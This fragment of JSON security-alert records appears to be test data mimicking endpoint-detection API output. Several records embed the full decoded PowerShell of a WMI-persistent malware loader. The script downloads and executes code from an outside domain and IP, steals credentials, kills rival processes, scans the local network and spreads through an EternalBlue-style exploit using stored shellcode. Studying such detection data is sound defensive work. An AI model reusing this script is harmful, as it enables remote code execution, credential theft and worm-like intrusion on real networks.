 $ S t a t i c C l a s s . P u t ( ) ","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. 
All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell 
Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) "],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) ","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. 
All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download 
String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
